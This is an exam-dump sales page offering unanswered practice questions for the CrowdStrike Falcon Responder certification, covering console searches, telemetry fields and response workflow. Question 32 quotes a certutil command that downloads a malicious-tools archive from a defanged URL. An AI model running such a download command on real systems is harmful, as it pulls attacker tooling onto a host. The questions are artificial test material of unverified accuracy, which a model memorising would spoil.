Summer Sale - Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65percent

Welcome To DumpsPedia

CCFR-201b Sample Questions Answers

Questions 4

While in an Event Search, a responder clicks on an event action. What does the ' Show Child Processes ' event action do?

Options:

A.

It displays a list of children in a new graphical tree.

B.

It generates a new Event Search based on the specific Event Action and Parent PID.

C.

It automatically terminates all children of that process on the endpoint.

D.

It pivots to the Host Search for the machine where the process ran.

Buy Now
Questions 5

What happens when you create a Sensor Visibility Exclusion for a trusted file path?

Options:

A.

It excludes host information from Detections and Incidents generated within that file path location

B.

It prevents file uploads to the CrowdStrike cloud from that file path

C.

It excludes sensor monitoring and event collection for the trusted file path

D.

It disables detection generation from that path, however the sensor can still perform prevention actions

Buy Now
Questions 6

A responder needs to find a specific sequence of network connections that did not trigger a detection. Which search tool allows them to search for anything within the raw telemetry?

Options:

A.

Host Search

B.

Event Search

C.

Hash Search

D.

User Search

Buy Now
Questions 7

How are processes on the same plane ordered (bottom ' VMTOOLSD.EXE ' to top CMD.EXE ' )?

7

7

Options:

A.

Process ID (Descending, highest on bottom)

B.

Time started (Descending, most recent on bottom)

C.

Time started (Ascending, most recent on top)

D.

Process ID (Ascending, highest on top)

Buy Now
Questions 8

When you configure and apply an IOA exclusion, what impact does it have on the host and what you see in the console?

Options:

A.

The process specified is not sent to the Falcon Sandbox for analysis

B.

The associated detection will be suppressed and the associated process would have been allowed to run

C.

The sensor will stop sending events from the process specified in the regex pattern

D.

The associated IOA will still generate a detection but the associated process would have been allowed to run

Buy Now
Questions 9

Which of the following sentences best describes the primary use of the ' Hash Executions ' Search (Bulk Search)?

Options:

A.

It allows a responder to upload a file to the cloud for detonating in a sandbox.

B.

It allows for a summary view of the environment-wide presence of a given list of multiple hashes.

C.

It allows an administrator to block a single hash across all machines.

D.

It provides a detailed process tree for every execution of a single hash.

Buy Now
Questions 10

What happens when a hash is allowlisted?

Options:

A.

Execution is prevented, but detection alerts are suppressed

B.

Execution is allowed on all hosts, including all other Falcon customers

C.

The hash is submitted for approval to be allowed to execute once confirmed by Falcon specialists

D.

Execution is allowed on all hosts that fall under the organization ' s CID

Buy Now
Questions 11

The Falcon sensor can take several automated actions to protect an endpoint. Which of the following is NOT an action that Falcon takes upon detection?

Options:

A.

Process Termination

B.

File Quarantine

C.

Process Restart

D.

Network Isolation

Buy Now
Questions 12

The Falcon sensor is designed to provide deep visibility into endpoint activity, yet it is not omniscient. According to the Cyber Kill Chain model, which of the following stages does the Falcon sensor typically NOT have visibility over?

Options:

A.

Exploitation of a memory-resident vulnerability

B.

Installation of a persistent backdoor

C.

Weaponization of a malicious payload on the adversary ' s infrastructure

D.

Delivery of a malicious document via an encrypted email attachment

Buy Now
Questions 13

You can jump to a Process Timeline from many views, like a Hash Search, by clicking which of the following?

Options:

A.

ProcessTimeline Link

B.

PID

C.

UTCtime

D.

Process ID or Parent Process ID

Buy Now
Questions 14

The Falcon console integrates heavily with the MITRE ATT AND CK framework to provide industry-standard context. Which of the following tactics displayed in the detection UI is a direct implementation of a MITRE ATT AND CK tactic?

Options:

A.

Malware Action

B.

Impact

C.

Intelligence-Based Match

D.

Script-Based Execution

Buy Now
Questions 15

An analyst is triaging a detection that has been categorized under the ‘Follow Through’ Objective Layer. Based on the Falcon technical documentation, which of the following adversary tactics is most likely to be observed within this specific layer?

Options:

A.

Credential Access through memory scraping

B.

Collection of sensitive data for exfiltration

C.

Initial Access via a drive-by download

D.

Discovery of local network shares and services

Buy Now
Questions 16

While the host timeline is comprehensive, some data is not included in that specific view. Which of the following CANNOT be seen directly from the host timeline?

Options:

A.

Timestamp

B.

Event Name

C.

PID (Process ID)

D.

CPU Temperature

Buy Now
Questions 17

An attacker attaches cmd.exe as a debugger to osk.exe through a registry key.

What tactic and technique describe this activity?

Options:

A.

Persistence via Image File Execution Options Injection

B.

Post-Exploit via Malicious Tool Execution

C.

Persistence via External Remote Services

D.

Privilege Escalation via Bypass User Account Control

Buy Now
Questions 18

When examining a raw DNS request event, you see a field called ContextProcessld_decimal. What is the purpose of that field?

Options:

A.

It contains the TargetProcessld_decimal value for other related events

B.

It contains an internal value not useful for an investigation

C.

It contains the ContextProcessld_decimal value for the parent process that made the DNS request

D.

It contains the TargetProcessld_decimal value for the process that made the DNS request

Buy Now
Questions 19

In the ' User Search - File Written ' section, a responder can see various files dropped by a user. Which of the following file types CANNOT be seen from this view?

Options:

A.

Scripts (.ps1, .sh)

B.

Executables (.exe)

C.

Executions (Process starts)

D.

Archive files (.zip, .7z)

Buy Now
Questions 20

You are writing a script that your colleagues could run on any Windows machine using Real Time Response (RTR). The script you have written is over the 40-KB limit.

How should you run the script to avoid technical issues?

Options:

A.

Use the put command to place the script on the host and runscript -hostpath to run the script

B.

Break the script into multiple files under 40 KB and run each one sequentially with runscript -raw

C.

Use the put command to place the script on the host and runscript -cloudfile to run the script

D.

Use the runscript -cloudfile command to upload the script from your local machine and execute it directly

Buy Now
Questions 21

While examining the ' Process Details ' sidebar of a detection, a responder sees the following icons: " 25 Network Operations " and " 277 Disk Operations " . What does this contextual data represent?

Options:

A.

The percentage of the CPU being consumed by the network and disk.

B.

The specific number of telemetry events recorded for network and disk activity by that process.

C.

The total size in megabytes of the data sent over the network and written to disk.

D.

The number of other hosts that have seen similar network and disk activity.

Buy Now
Questions 22

Responders use ' IP Search ' to track connections to malicious infrastructure. Which of the following statements about the IP Search is FALSE?

Options:

A.

It identifies every host that connected to a specific IP.

B.

It provides Intel data if the IP is known to CrowdStrike.

C.

The search only allows for one IP to be entered at a time.

D.

It shows the first and last time the IP was seen in the environment.

Buy Now
Questions 23

When investigating system-level persistence, it is critical to know what the services.exe process is responsible for. What is its primary function?

Options:

A.

Managing user profiles and registry hives during login.

B.

Launching and managing the lifecycle of system services.

C.

Monitoring network traffic for potential data exfiltration.

D.

Providing a graphical interface for the Windows Task Manager.

Buy Now
Questions 24

The Activity Dashboard is a core feature for security teams. What is the primary purpose of this dashboard?

Options:

A.

To manage the installation and update of Falcon sensors.

B.

To provide a summary of the current threat state and active detections in the environment.

C.

To view the raw telemetry of every event happening on the network.

D.

To audit the changes made by other Falcon administrators.

Buy Now
Questions 25

Aside from a Process Timeline or Event Search, how do you export process event data from a detection in .CSV format?

Options:

A.

You can ' t export detailed event data from a detection, you have to use the Process Timeline or an Event Search

B.

In Full Detection Details, you expand the nodes of the process tree you wish to expand and then click the " Export Process Events " button

C.

In Full Detection Details, you choose the " View Process Activity " option and then export from that view

D.

From the Detections Dashboard, you right-click the event type you wish to export and choose CSV. JSON or XML

Buy Now
Questions 26

To track the relationship between a parent and its child, Falcon uses specific ID fields. What raw data is used as the ' ParentProcessId_decimal ' when a process spawns a child process?

Options:

A.

The Operating System PID of the parent.

B.

The TargetProcessId_decimal of the parent process.

C.

The ContextProcessId_decimal of the system.

D.

The RootProcessId_decimal of the entire tree.

Buy Now
Questions 27

If the Falcon sensor identifies suspicious behavioral patterns—such as a process attempting to dump memory from lsass.exe—what specific type of detection will be generated?

Options:

A.

Indicator of Compromise (IOC)

B.

Indicator of Attack (IOA)

C.

Known Malware Alert

D.

Intelligence Data Match

Buy Now
Questions 28

An analyst needs to perform local sandbox analysis on a malicious file. When they download a quarantined file from the Falcon UI, what is the file format and the default password?

Options:

A.

.zip, password: crowdstrike

B.

.7-zip, password: infected

C.

.rar, password: malware

D.

.exe, no password

Buy Now
Questions 29

According to the Falcon Overwatch Best Practice workflow, what is the required next step after a responder completes the ' Understand the process(es) involved ' step?

Options:

A.

Isolate the host to prevent lateral movement.

B.

Examine what is normal for the system to identify deviations.

C.

Delete the malicious file from the endpoint.

D.

Pivot to the Intelligence dashboard for actor attribution.

Buy Now
Questions 30

The User Search results are organized into several categories. Which of the following is NOT a sub-heading in the User Search?

Options:

A.

User Logons

B.

Unique Executables Written

C.

Admin tool usage

D.

Network Connections

Buy Now
Questions 31

Responders often need to organize detections to identify trends across the environment. Which of the following is NOT a grouping option currently available on the ' Endpoint Detections ' page?

Options:

A.

Grouped by Process

B.

Grouped by Alert

C.

Grouped by File Path

D.

Grouped by Severity

Buy Now
Questions 32

You receive a detection on certutil.exe executing the following command line:

certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip "

What is the appropriate next step to discover how this occurred?

Options:

A.

Investigate host event logs pertaining to logon-type events

B.

Investigate the process tree and determine what executed certutil.exe

C.

Investigate the host by using on-demand scans

D.

Investigate the host’s firewall settings

Buy Now
Questions 33

The function of Machine Learning Exclusions is to___________.

Options:

A.

stop all detections for a specific pattern ID

B.

stop all sensor data collection for the matching path(s)

C.

Stop all Machine Learning Preventions but a detection will still be generated and files will still be uploaded to the CrowdStrike Cloud

D.

stop all ML-based detections and preventions for the matching path(s) and/or stop files from being uploaded to the CrowdStrike Cloud

Buy Now
Questions 34

Multiple detections with the process schtasks.exe begin to alert in the UI. The process executes the following command line on several unique hosts:

schtasks.exe /Query /TN " Qljsscdqr "

What is the most efficient way to identify which hosts are executing this scheduled task?

Options:

A.

Filter detections by command line and sort by ' Host:A to Z '

B.

Filter detections by command line and group by triggering file

C.

Filter detections by the triggering file and sort by ' Host:A to Z '

D.

Filter detections by command line and group by host

Buy Now
Questions 35

Your lead analyst instructs you to dump the kernel memory of a Windows system using Real Time Response (RTR).

Which native RTR command best helps you to quickly achieve the task?

Options:

A.

CSWINDIAG

B.

dumpmem

C.

xmemdump

D.

memdump

Buy Now
Questions 36

What action is needed to ensure Falcon does not block or generate a detection for a process by using the file hash?

Options:

A.

Create a Custom IOC with an action of allow for the hash

B.

Create a Machine Learning Exclusion with an action of allow for the hash

C.

Create a Custom IOA with an action of allow for the hash

D.

Create an IOA Exclusion with an action of allow for the hash

Buy Now
Questions 37

You are reviewing the raw data in an Event Search from a detection tree. You find a DnsRequest event and want to determine whether any other DNS requests were performed by the original process.

Which two field values do you need from this event to perform a Process Timeline search?

Options:

A.

ParentProcessId and aid

B.

ResponsibleProcessId and aid

C.

RequestType and aid

D.

ContextProcessId and aid

Buy Now
Questions 38

A responder is analyzing a process tree where a suspicious executable is listed as a direct child of services.exe. In this scenario, which source is most likely responsible for the execution?

Options:

A.

An interactive user login via RDP.

B.

A Windows Service or a process launched by the Service Control Manager.

C.

A web browser download initiated by the end user.

D.

A script executed directly from a removable USB drive.

Buy Now
Questions 39

A responder has identified a suspicious PowerShell script executing on a domain controller. To perform a deep-dive forensic analysis of every action taken by that specific process—including network connections and file modifications—the analyst needs to pivot to a Process Timeline. What is the absolute minimum telemetry data required to generate this auto-filled view?

Options:

A.

Agent ID (AID) and Local IP Address

B.

Agent ID (AID) and Target Process ID (TargetProcessId_decimal)

C.

Hostname and MAC Address

D.

User SID and SHA256 Hash

Buy Now
Questions 40

CrowdStrike supports various deployment types. What is a ' POD sensor ' ?

Options:

A.

A sensor specifically designed for mobile devices (iOS/Android).

B.

A sensor that is installed directly on a Kubernetes or Docker host to monitor containers.

C.

A legacy sensor used only for disconnected or air-gapped systems.

D.

A physical appliance that sits on the network to monitor traffic.

Buy Now
Questions 41

Falcon uses specific identifiers to track processes across the environment. Which of the following sentences best describes what the ' TargetProcessId_decimal ' raw data represents?

Options:

A.

The standard Process ID (PID) assigned by the Windows operating system.

B.

A sensor-assigned decimal number that is unique for each process across time and hosts.

C.

The memory address where the process’s executable is loaded.

D.

The total number of seconds the process has been running.

Buy Now
Questions 42

The Bulk Domain Search tool contains Domain information along with which of the following?

Options:

A.

Process Information

B.

Port Information

C.

IP Lookup Information

D.

Threat Actor Information

Buy Now
Questions 43

CrowdScore is a metric used to identify the severity of an ongoing incident. What percentage of increase in a CrowdScore is considered a strong indication of a coordinated attack?

Options:

A.

10%

B.

20%

C.

50%

D.

100%

Buy Now
Questions 44

Which specific event type in the Falcon telemetry is associated with the creation of a new ' TargetProcessId_decimal ' ?

Options:

A.

ProcessRollup2

B.

FileCreation

C.

NetworkConnect

D.

RegistryUpdate

Buy Now
Questions 45

A SOC Manager is reviewing the monthly efficiency of the incident response team. They are specifically analyzing how many alerts were handled by each individual analyst and the ratio of legitimate threats to noise to optimize staffing levels. While navigating the Detection Resolutions Dashboard, which of the following metrics would they NOT find, as it is primarily located within the Activity or Executive summary dashboards?

Options:

A.

Detections by user (Analyst performance)

B.

Total Detections by Host

C.

Total count of False Positives

D.

Detection resolution status breakdown

Buy Now
Questions 46

Which of the following sentences best describes the primary use of ' Retrospective Analysis ' ?

Options:

A.

Identifying future threats using predictive AI models.

B.

Applying an investigative approach across historical timed buckets of telemetry to find past activity.

C.

Terminating a malicious process as it starts to execute.

D.

Recovering files that were encrypted by a ransomware attack.

Buy Now
Questions 47

Refer to the image.

47

Within a Host Search, you have filtered for cmd.exe in the Process executions table and now need to pivot to a process timeline.

Which item in the table do you select to pivot to the Process Timeline?

Options:

A.

PID

B.

Process ID

C.

Command Line

Buy Now
Questions 48

On the Host Timeline dashboard, what built-in parameter would you modify in order to filter specific events in the timeline?

Options:

A.

#event_timelineName

B.

#event_Name

C.

#event_simpleName

D.

#event_simpleType

Buy Now
Questions 49

Refer to the image.

49

What does the arrowed line indicate?

Options:

A.

PowerShell spawned Notepad.exe, which injected a thread back to Excel.exe

B.

The thread injection was considered a Medium severity injection

C.

PowerShell spawned Notepad.exe, which injected a thread back to PowerShell

D.

Notepad.exe injected itself into Excel.exe

Buy Now
Questions 50

After pivoting to an event search from a detection, you locate the ProcessRollup2 event. Which two field values are you required to obtain to perform a Process Timeline search so you can determine what the process was doing?

Options:

A.

SHA256 and TargetProcessld_decimal

B.

SHA256 and ParentProcessld_decimal

C.

aid and ParentProcessld_decimal

D.

aid and TargetProcessld_decimal

Buy Now
Questions 51

If an organization is experiencing several false positives from a specific Machine Learning (ML) detection group and wants to create a tightly-scoped allowlist, which grouping should they use first?

Options:

A.

Group by Filename

B.

Group by Hash

C.

Group by Command Line

D.

Group by User

Buy Now
Questions 52

How long are quarantined files stored on the host?

Options:

A.

45 Days

B.

30 Days

C.

Quarantined files are never deleted from the host

D.

90 Days

Buy Now
Questions 53

An adversary is attempting to disable security features by modifying the system registry. Which of the following native Windows processes is specifically designed to create, modify, and delete Registry keys via the command line?

Options:

A.

reg.exe

B.

taskmgr.exe

C.

lsass.exe

D.

svchost.exe

Buy Now
Questions 54

When reviewing a Host Timeline, which of the following filters is available?

Options:

A.

Severity

B.

Event Types

C.

User Name

D.

Detection ID

Buy Now
Questions 55

CrowdStrike implements a specific framework within the Falcon console to help responders categorize detections based on the adversary’s ultimate goals and the technical means used to achieve them. This classification system, which maps activity to known industry standards, is known as the:

Options:

A.

MITRE-Based Falcon Detections Framework

B.

Falcon Adversary Attribution and Motivation Matrix

C.

Unified Behavioral Threat Hunting Schema

D.

CrowdStrike Intelligence Lifecycle Mapping

Buy Now
Questions 56

When navigating the main ' Detections ' page, several filters are available in the dropdown menu. Which of the following is NOT a filter available in this menu?

Options:

A.

Severity

B.

Tactic

C.

Location tag

D.

Status

Buy Now
Questions 57

You receive an email from a third-party vendor that one of their services is compromised,thevendor names a specific IP address that the compromised service was using. Where would you input this indicator to find any activity related to this IP address?

Options:

A.

IP Addresses

B.

Remote or Network Logon Activity

C.

Remote Access Graph

D.

Hash Executions

Buy Now
Questions 58

What is the difference between Managed and Unmanaged Neighbors in the Falcon console?

Options:

A.

A managed neighbor is currently network contained and an unmanaged neighbor is uncontained

B.

A managed neighbor has an installed and provisioned sensor

C.

An unmanaged neighbor is in a segmented area of the network

D.

A managed sensor has an active prevention policy

Buy Now
Questions 59

When looking at the details of a detection, there are two fields called Global Prevalence and Local Prevalence. Which answer best defines Local Prevalence?

Options:

A.

Local prevalence is the frequency with which the hash of the triggering file is seen across the entire Internet

B.

Local Prevalence tells you how common the hash of the triggering file is within your environment (CID)

C.

Local Prevalence is the Virus Total score for the hash of the triggering file

D.

Local prevalence is the frequency with which the hash of the triggering file is seen across all CrowdStrike customer environments

Buy Now
Questions 60

A responder is looking at event telemetry and sees an event named ' ProcessRollup2 ' . Which sentence best describes what this event type represents?

Options:

A.

An existing process was terminated by the user.

B.

A new process was created and started on the endpoint.

C.

A process successfully established a network connection.

D.

A process modified a sensitive registry key.

Buy Now
Questions 61

When an analyst is trying to pinpoint the exact moment an endpoint came online after being shut down for the weekend, which timeline view is the best to use?

Options:

A.

Process Timeline

B.

Host Timeline

C.

User Timeline

D.

Network Timeline

Buy Now
Questions 62

Executive dashboards provide a high-level view of security. Which of the following CANNOT be seen from the Executive Summary Dashboard?

Options:

A.

Detections broken down by Tactic.

B.

A breakdown of Agent Versions across the fleet.

C.

The top 10 hosts with the most detections.

D.

The organization’s current CrowdScore trend.

Buy Now
Exam Code: CCFR-201b
Exam Name: CrowdStrike Certified Falcon Responder
Last Update: Jul 26, 2026
Questions: 209

PDF + Testing Engine

$59.99 $171.4

Testing Engine

$44.99 $128.55

PDF (Q&A)

$49.99 $142.82